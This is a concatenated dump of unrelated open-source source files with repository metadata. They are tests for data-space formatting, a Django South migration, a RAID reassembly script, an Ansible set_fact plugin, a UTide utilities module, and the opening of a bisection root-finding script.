new_CS_batch = VS.format_as(VS_batch, CS_non_default)
new_VS_batch = VS.undo_format_as(new_CS_batch, CS_non_default)
assert new_VS_batch is VS_batch
# Start in Conv2D with default axes
CS_batch = CS.make_theano_batch()
new_VS_batch = CS.format_as(CS_batch, VS)
new_CS_batch = CS.undo_format_as(new_VS_batch, VS)
assert new_CS_batch is CS_batch
# Non-default axes
CS_batch = CS_non_default.make_theano_batch()
new_VS_batch = CS_non_default.format_as(CS_batch, VS)
new_CS_batch = CS_non_default.undo_format_as(new_VS_batch, VS)
assert new_CS_batch is CS_batch
# Composite Space to VectorSpace
VS = VectorSpace(dim=27)
CS = Conv2DSpace(shape=[2, 2], num_channels=3, axes=('b', 0, 1, 'c'))
CompS = CompositeSpace((CompositeSpace((VS, VS)), CS))
VS_large = VectorSpace(dim=(2*27+12))
CompS_batch = CompS.make_theano_batch()
new_VS_batch = CompS.format_as(CompS_batch, VS_large)
new_CompS_batch = CompS.undo_format_as(new_VS_batch, VS_large)
assert_components(CompS_batch, new_CompS_batch)
# VectorSpace to Composite Space
CompS = CompositeSpace((CompositeSpace((VS, VS)), CS))
VS_batch = VS_large.make_theano_batch()
new_CompS_batch = VS_large.format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_format_as(new_CompS_batch, CompS)
assert VS_batch is new_VS_batch
# Reorder CompositeSpace
CompS = CompositeSpace((VS, CompositeSpace((VS, CS))))
VS_batch = VS_large.make_theano_batch()
new_CompS_batch = VS_large.format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_format_as(new_CompS_batch, CompS)
assert VS_batch is new_VS_batch
# Reorder CompositeSpace
CompS = CompositeSpace((CompositeSpace((CompositeSpace((VS,)), CS)), VS))
VS_batch = VS_large.make_theano_batch()
new_CompS_batch = VS_large.format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_format_as(new_CompS_batch, CompS)
assert VS_batch is new_VS_batch
# CompositeSpace to CompositeSpace
VS = VectorSpace(dim=27)
CS = Conv2DSpace(shape=[3, 3], num_channels=3, axes=('b', 0, 1, 'c'))
CompS_VS = CompositeSpace((CompositeSpace((VS, VS)), VS))
CompS_CS = CompositeSpace((CompositeSpace((CS, CS)), CS))
CompS_VS_batch = CompS_VS.make_theano_batch()
new_CompS_CS_batch = CompS_VS.format_as(CompS_VS_batch, CompS_CS)
new_CompS_VS_batch = CompS_VS.undo_format_as(new_CompS_CS_batch, CompS_CS)
assert_components(CompS_VS_batch, new_CompS_VS_batch)
def test_numeric_undo_format_as():
"""
Test functionality of undo_np_format_as on numeric batches.
This calls np_format_as with spaces reversed.
"""
# Compare identity of Composite batches
def assert_components(batch1, batch2):
for e1, e2 in zip(batch1, batch2):
if isinstance(e1, tuple) and isinstance(e2, tuple):
assert_components(e1, e2)
elif isinstance(e1, tuple) or isinstance(e2, tuple):
raise ValueError('Composite batches do not match.')
else:
assert np.allclose(e1, e2)
# VectorSpace and Conv2DSpace
VS = VectorSpace(dim=27)
VS_sparse = VectorSpace(dim=27, sparse=True)
# VectorSpace to Sparse VectorSpace
VS_batch = np.arange(270).reshape(10, 27)
new_SVS_batch = VS.np_format_as(VS_batch, VS_sparse)
new_VS_batch = VS.undo_np_format_as(new_SVS_batch, VS_sparse)
assert np.allclose(new_VS_batch, VS_batch)
# ConvSpace to ConvSpace
CS = Conv2DSpace(shape=[3, 3],
num_channels=3,
axes=('b', 0, 1, 'c'),
dtype='float32')
CS_non_default = Conv2DSpace(shape=[3, 3],
num_channels=3,
axes=('c', 'b', 0, 1),
dtype='float64')
CS_batch = np.arange(270).reshape(10, 3, 3, 3).astype('float32')
new_ndCS_batch = CS.np_format_as(CS_batch, CS_non_default)
new_CS_batch = CS.undo_np_format_as(new_ndCS_batch, CS_non_default)
assert np.allclose(new_CS_batch, CS_batch)
assert new_ndCS_batch.shape != CS_batch.shape
assert new_ndCS_batch.dtype == 'float64'
assert new_CS_batch.dtype == 'float32'
ndCS_batch = np.arange(270).reshape(3, 10, 3, 3)
new_CS_batch = CS_non_default.np_format_as(ndCS_batch, CS)
new_ndCS_batch = CS_non_default.undo_np_format_as(new_CS_batch, CS)
assert np.allclose(new_ndCS_batch, ndCS_batch)
assert new_CS_batch.shape != ndCS_batch.shape
assert new_ndCS_batch.dtype == 'float64'
assert new_CS_batch.dtype == 'float32'
# Start in VectorSpace
VS_batch = np.arange(270).reshape(10, 27)
new_CS_batch = VS.np_format_as(VS_batch, CS)
new_VS_batch = VS.undo_np_format_as(new_CS_batch, CS)
assert np.allclose(new_VS_batch, VS_batch)
# Non-default axes
new_CS_batch = VS.np_format_as(VS_batch, CS_non_default)
new_VS_batch = VS.undo_np_format_as(new_CS_batch, CS_non_default)
assert np.allclose(new_VS_batch, VS_batch)
# Start in Conv2D with default axes
CS_batch = np.arange(270).reshape(10, 3, 3, 3)
new_VS_batch = CS.np_format_as(CS_batch, VS)
new_CS_batch = CS.undo_np_format_as(new_VS_batch, VS)
assert np.allclose(new_CS_batch, CS_batch)
# Non-default axes
CS_batch = np.arange(270).reshape(3, 10, 3, 3)
new_VS_batch = CS_non_default.np_format_as(CS_batch, VS)
new_CS_batch = CS_non_default.undo_np_format_as(new_VS_batch, VS)
assert np.allclose(new_CS_batch, CS_batch)
# Composite Space to VectorSpace
VS = VectorSpace(dim=27)
CS = Conv2DSpace(shape=[2, 2], num_channels=3, axes=('b', 0, 1, 'c'))
CompS = CompositeSpace((CompositeSpace((VS, VS)), CS))
VS_large = VectorSpace(dim=(2*27+12))
VS_batch = np.arange(270).reshape(10, 27)
VS_batch2 = 2*np.arange(270).reshape(10, 27)
CS_batch = 3*np.arange(120).reshape(10, 2, 2, 3)
CompS_batch = ((VS_batch, VS_batch2), CS_batch)
new_VS_batch = CompS.np_format_as(CompS_batch, VS_large)
new_CompS_batch = CompS.undo_np_format_as(new_VS_batch, VS_large)
assert_components(CompS_batch, new_CompS_batch)
# VectorSpace to Composite Space
CompS = CompositeSpace((CompositeSpace((VS, VS)), CS))
VS_batch = np.arange((2*27+12)*10).reshape(10, 2*27+12)
new_CompS_batch = VS_large.np_format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_np_format_as(new_CompS_batch, CompS)
assert np.allclose(VS_batch, new_VS_batch)
# Reorder CompositeSpace
CompS = CompositeSpace((VS, CompositeSpace((VS, CS))))
VS_batch = np.arange((2*27+12)*10).reshape(10, 2*27+12)
new_CompS_batch = VS_large.np_format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_np_format_as(new_CompS_batch, CompS)
assert np.allclose(VS_batch, new_VS_batch)
# Reorder CompositeSpace
CompS = CompositeSpace((CompositeSpace((CompositeSpace((VS,)), CS)), VS))
VS_batch = np.arange((2*27+12)*10).reshape(10, 2*27+12)
new_CompS_batch = VS_large.np_format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_np_format_as(new_CompS_batch, CompS)
assert np.allclose(VS_batch, new_VS_batch)
# CompositeSpace to CompositeSpace
VS = VectorSpace(dim=27)
CS = Conv2DSpace(shape=[3, 3], num_channels=3, axes=('b', 0, 1, 'c'))
VS_batch = np.arange(270).reshape(10, 27)
VS_batch2 = 2*np.arange(270).reshape(10, 27)
VS_batch3 = 3*np.arange(270).reshape(10, 27)
CompS_VS = CompositeSpace((CompositeSpace((VS, VS)), VS))
CompS_CS = CompositeSpace((CompositeSpace((CS, CS)), CS))
CompS_VS_batch = ((VS_batch, VS_batch2), VS_batch3)
new_CompS_CS_batch = CompS_VS.np_format_as(CompS_VS_batch, CompS_CS)
new_CompS_VS_batch = CompS_VS.undo_np_format_as(new_CompS_CS_batch,
CompS_CS)
assert_components(CompS_VS_batch, new_CompS_VS_batch)
| bsd-3-clause | 6,151,758,451,863,893,000 | 40.931457 | 79 | 0.541373 | false |
k0001/mediasancion | mediasancion/core/migrations/0001_initial.py | 1 | 15801 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Distrito'
db.create_table('core_distrito', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('remote_source', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('remote_url', self.gf('django.db.models.fields.URLField')(max_length=1023, blank=True)),
('remote_id', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('origin', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('uuid', self.gf('django.db.models.fields.CharField')(db_index=True, unique=True, max_length=36, blank=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=128)),
('slug', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=50, blank=True)),
))
db.send_create_signal('core', ['Distrito'])
# Adding model 'Partido'
db.create_table('core_partido', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('remote_source', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('remote_url', self.gf('django.db.models.fields.URLField')(max_length=1023, blank=True)),
('remote_id', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('origin', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('uuid', self.gf('django.db.models.fields.CharField')(db_index=True, unique=True, max_length=36, blank=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=50, blank=True)),
))
db.send_create_signal('core', ['Partido'])
# Adding model 'Bloque'
db.create_table('core_bloque', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('remote_source', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('remote_url', self.gf('django.db.models.fields.URLField')(max_length=1023, blank=True)),
('remote_id', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('origin', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('uuid', self.gf('django.db.models.fields.CharField')(db_index=True, unique=True, max_length=36, blank=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=50, blank=True)),
))
db.send_create_signal('core', ['Bloque'])
# Adding model 'Persona'
db.create_table('core_persona', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('remote_source', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('remote_url', self.gf('django.db.models.fields.URLField')(max_length=1023, blank=True)),
('remote_id', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('origin', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('uuid', self.gf('django.db.models.fields.CharField')(db_index=True, unique=True, max_length=36, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=50, blank=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=128)),
('apellido', self.gf('django.db.models.fields.CharField')(max_length=128)),
('documento_tipo', self.gf('django.db.models.fields.CharField')(max_length=1, null=True, blank=True)),
('documento_numero', self.gf('django.db.models.fields.CharField')(max_length=63, null=True, blank=True)),
('email', self.gf('django.db.models.fields.EmailField')(max_length=75, null=True, blank=True)),
('telefono', self.gf('django.db.models.fields.CharField')(max_length=32, null=True, blank=True)),
('website', self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True)),
('foto', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True)),
))
db.send_create_signal('core', ['Persona'])
def backwards(self, orm):
# Deleting model 'Distrito'
db.delete_table('core_distrito')
# Deleting model 'Partido'
db.delete_table('core_partido')
# Deleting model 'Bloque'
db.delete_table('core_bloque')
# Deleting model 'Persona'
db.delete_table('core_persona')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.bloque': {
'Meta': {'object_name': 'Bloque'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_url': ('django.db.models.fields.URLField', [], {'max_length': '1023', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'unique': 'True', 'max_length': '36', 'blank': 'True'})
},
'core.distrito': {
'Meta': {'object_name': 'Distrito'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_url': ('django.db.models.fields.URLField', [], {'max_length': '1023', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'unique': 'True', 'max_length': '36', 'blank': 'True'})
},
'core.partido': {
'Meta': {'object_name': 'Partido'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_url': ('django.db.models.fields.URLField', [], {'max_length': '1023', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'unique': 'True', 'max_length': '36', 'blank': 'True'})
},
'core.persona': {
'Meta': {'object_name': 'Persona'},
'apellido': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'documento_numero': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'documento_tipo': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'foto': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'remote_url': ('django.db.models.fields.URLField', [], {'max_length': '1023', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}),
'telefono': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'unique': 'True', 'max_length': '36', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['core']
| agpl-3.0 | -2,885,843,716,758,494,700 | 78.005 | 182 | 0.578508 | false |
py4n6/pyflag | utilities/raid_test.py | 7 | 1982 | # This is a good example of how the sk.c stuff can be integrated into
# the raid stuff to be able to verify the image without unpacking the
# whole thing.
import mapper
import optparse,sys
import sk
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option('-p','--period',default=6, type='int',
help = "periodicity of the map")
parser.add_option('-m','--map',default=None,
help = "The Map file itself")
parser.add_option('-s','--skip',default='0',
help = "length of data to skip in each disk")
parser.add_option('-n','--number',default=6, type='int',
help = "Number of disks")
parser.add_option('-b','--blocksize',default="512",
help = "block size")
parser.add_option('-P','--print_map',default=False, action='store_true',
help = "print the map")
parser.add_option('-o','--output', default="output.dd",
help = "Name of the output file")
parser.add_option("-S", "--subsys",
default=None,
help="Subsystem to use (e.g. EWF)")
(options, args) = parser.parse_args()
raid_map = mapper.load_map_file(options.map, options.period)
if options.print_map:
mapper.pretty_print(raid_map, options.period, options.number)
print mapper.calculate_map(raid_map, options.period, options.number)
sys.exit(0)
blocksize = mapper.parse_offsets(options.blocksize)
fds=[]
for arg in args:
if arg != "None":
fds.append(mapper.open_image(arg, options.subsys))
else:
fds.append(mapper.ParityDisk([mapper.open_image(arg) for arg in args if arg != 'None']))
fd = mapper.RaidReassembler(raid_map, fds, blocksize, skip=mapper.parse_offsets(options.skip))
skfs = sk.skfs(fd, imgoff = 128 * 1024 + 512 * 63)
print skfs.listdir("/")
| gpl-2.0 | 1,880,320,108,587,510,800 | 33.77193 | 100 | 0.577699 | false |
muravjov/ansible | v2/ansible/plugins/action/set_fact.py | 15 | 1402 | # Copyright 2013 Dag Wieers <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from ansible.errors import AnsibleError
from ansible.plugins.action import ActionBase
from ansible.template import Templar
from ansible.utils.boolean import boolean
class ActionModule(ActionBase):
TRANSFERS_FILES = False
def run(self, tmp=None, task_vars=dict()):
templar = Templar(loader=self._loader, variables=task_vars)
facts = dict()
if self._task.args:
for (k, v) in self._task.args.iteritems():
k = templar.template(k)
if isinstance(v, basestring) and v.lower() in ('true', 'false', 'yes', 'no'):
v = boolean(v)
facts[k] = v
return dict(changed=True, ansible_facts=facts)
| gpl-3.0 | 6,678,922,070,172,358,000 | 37.944444 | 93 | 0.689016 | false |
efiring/UTide | utide/utilities.py | 1 | 8730 | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
import numpy as np
from scipy.io import loadmat
# This module is an excerpt from the one in python-gsw.
# Based on Robert Kern's Bunch; taken from
# http://currents.soest.hawaii.edu/hgstage/pycurrents/
# pycurrents/system/utilities.py
class Bunch(dict):
"""
A dictionary that also provides access via attributes.
Additional methods update_values and update_None provide
control over whether new keys are added to the dictionary
when updating, and whether an attempt to add a new key is
ignored or raises a KeyError.
The Bunch also prints differently than a normal
dictionary, using str() instead of repr() for its
keys and values, and in key-sorted order. The printing
format can be customized by subclassing with a different
str_ftm class attribute. Do not assign directly to this
class attribute, because that would substitute an instance
attribute which would then become part of the Bunch, and
would be reported as such by the keys() method.
To output a string representation with
a particular format, without subclassing, use the
formatted() method.
"""
str_fmt = "{0!s:<{klen}} : {1!s:>{vlen}}\n"
def __init__(self, *args, **kwargs):
"""
*args* can be dictionaries, bunches, or sequences of
key,value tuples. *kwargs* can be used to initialize
or add key, value pairs.
"""
dict.__init__(self)
self.__dict__ = self
for arg in args:
self.update(arg)
self.update(kwargs)
def __str__(self):
return self.formatted()
def formatted(self, fmt=None, types=False):
"""
Return a string with keys and/or values or types.
*fmt* is a format string as used in the str.format() method.
The str.format() method is called with key, value as positional
arguments, and klen, vlen as kwargs. The latter are the maxima
of the string lengths for the keys and values, respectively,
up to respective maxima of 20 and 40.
"""
if fmt is None:
fmt = self.str_fmt
items = list(self.items())
items.sort()
klens = []
vlens = []
for i, (k, v) in enumerate(items):
lenk = len(str(k))
if types:
v = type(v).__name__
lenv = len(str(v))
items[i] = (k, v)
klens.append(lenk)
vlens.append(lenv)
klen = min(20, max(klens))
vlen = min(40, max(vlens))
slist = [fmt.format(key, value, klen=klen, vlen=vlen) for
key, value in items]
return ''.join(slist)
def from_pyfile(self, filename):
"""
Read in variables from a python code file.
"""
# We can't simply exec the code directly, because in
# Python 3 the scoping for list comprehensions would
# lead to a NameError. Wrapping the code in a function
# fixes this.
d = dict()
lines = ["def _temp_func():\n"]
with open(filename) as f:
lines.extend([" " + line for line in f])
lines.extend(["\n return(locals())\n",
"_temp_out = _temp_func()\n",
"del(_temp_func)\n"])
codetext = "".join(lines)
code = compile(codetext, filename, 'exec')
exec(code, globals(), d)
self.update(d["_temp_out"])
return self
def update_values(self, *args, **kw):
"""
arguments are dictionary-like; if present, they act as
additional sources of kwargs, with the actual kwargs
taking precedence.
One reserved optional kwarg is "strict". If present and
True, then any attempt to update with keys that are not
already in the Bunch instance will raise a KeyError.
"""
strict = kw.pop("strict", False)
newkw = dict()
for d in args:
newkw.update(d)
newkw.update(kw)
self._check_strict(strict, newkw)
dsub = dict([(k, v) for (k, v) in newkw.items() if k in self])
self.update(dsub)
def update_None(self, *args, **kw):
"""
Similar to update_values, except that an existing value
will be updated only if it is None.
"""
strict = kw.pop("strict", False)
newkw = dict()
for d in args:
newkw.update(d)
newkw.update(kw)
self._check_strict(strict, newkw)
dsub = dict([(k, v) for (k, v) in newkw.items()
if k in self and self[k] is None])
self.update(dsub)
def _check_strict(self, strict, kw):
if strict:
bad = set(kw.keys()) - set(self.keys())
if bad:
bk = list(bad)
bk.sort()
ek = list(self.keys())
ek.sort()
raise KeyError(
"Update keys %s don't match existing keys %s" % (bk, ek))
# The following functions ending with loadbunch() and showmatbunch()
# are taken from the repo
# http://currents.soest.hawaii.edu/hgstage/pycurrents/,
# pycurrents/file/matfile.py.
def _crunch(arr, masked=True):
"""
Handle all arrays that are not Matlab structures.
"""
if arr.size == 1:
arr = arr.item() # Returns the contents.
return arr
# The following squeeze is discarding some information;
# we might want to make it optional.
arr = arr.squeeze()
if masked and arr.dtype.kind == 'f': # Check for complex also.
arrm = np.ma.masked_invalid(arr)
if arrm.count() < arrm.size:
arr = arrm
else:
arr = np.array(arr) # Copy to force a read.
else:
arr = np.array(arr)
return arr
def _structured_to_bunch(arr, masked=True):
"""
Recursively move through the structure tree, creating
a Bunch for each structure. When a non-structure is
encountered, process it with crunch().
"""
# A single "void" object comes from a Matlab structure.
# Each Matlab structure field corresponds to a field in
# a numpy structured dtype.
if arr.dtype.kind == 'V' and arr.shape == (1, 1):
b = Bunch()
x = arr[0, 0]
for name in x.dtype.names:
b[name] = _structured_to_bunch(x[name], masked=masked)
return b
return _crunch(arr, masked=masked)
def _showmatbunch(b, elements=None, origin=None):
if elements is None:
elements = []
if origin is None:
origin = ''
items = list(b.items())
for k, v in items:
_origin = "%s.%s" % (origin, k)
if isinstance(v, Bunch):
_showmatbunch(v, elements, _origin)
else:
if isinstance(v, str):
slen = len(v)
if slen < 50:
entry = v
else:
entry = 'string, %d characters' % slen
elif isinstance(v, np.ndarray):
if np.ma.isMA(v):
entry = 'masked array, shape %s, dtype %s' % (v.shape, v.dtype)
else:
entry = 'ndarray, shape %s, dtype %s' % (v.shape, v.dtype)
else:
entry = '%s %s' % (type(v).__name__, v)
elements.append((_origin, entry))
elements.sort()
return elements
def showmatbunch(b):
"""
Show the contents of a matfile as it has been, or would be, loaded
by loadbunch.
*b* can be either the name of a matfile or the output of loadbunch.
Returns a multi-line string suitable for printing.
"""
if isinstance(b, str):
b = loadbunch(b)
elist = _showmatbunch(b)
names = [n for n, v in elist]
namelen = min(40, max([len(n) for n in names]))
str_fmt = "{0!s:<{namelen}} : {1!s}\n"
strlist = [str_fmt.format(n[1:], v, namelen=namelen) for (n, v) in elist]
return ''.join(strlist)
def loadbunch(fname, masked=True):
"""
Wrapper for loadmat that dereferences (1,1) object arrays,
converts floating point arrays to masked arrays, and uses
nested Bunch objects in place of the matlab structures.
"""
out = Bunch()
if fname.endswith('.mat'):
with open(fname, 'rb') as fobj:
xx = loadmat(fobj)
elif fname.endswith('.npz'):
xx = np.load(fname, encoding='latin1')
else:
raise ValueError('Unrecognized file {}'.format(fname))
keys = [k for k in xx.keys() if not k.startswith("__")]
for k in keys:
out[k] = _structured_to_bunch(xx[k], masked=masked)
return out
| mit | -8,632,641,698,840,548,000 | 31.574627 | 83 | 0.568614 | false |
DrkVenom/roots | roots.py | 1 | 9713 | #Name: Tony Ranieri
#Created: October 2014
#Modified: August 2015
import numpy as np
import pylab as py
import matplotlib.pyplot as plt
def roots(f,df,a,b,niter,epsilon):
# Input
# f: the function that we need to find roots for
# df: derivative of the function f
# a: initial left bracket x-coord
# b: initial right bracket x-coord
# niter: max number of iterations
# epsilon: tolerance for the stopping rule
#
# Output
# xstar: the root of f for given tolerance epsilon
# perform bisect
fa=f(a) #define y-coord at a based on the given f
fb=f(b) #define y-coord at b based on the given f
if (fa*fb>0): #test to see if there is a single root in the bracket
print "There are either no roots in this bracket, or an even number of them. Please refine your bracket."
return 1
for i in range(niter):
xstar=(a+b)/2 #define xstar as the midpoint of the current bracket
fxstar=f(xstar) #set the value of our function at this new midpoint
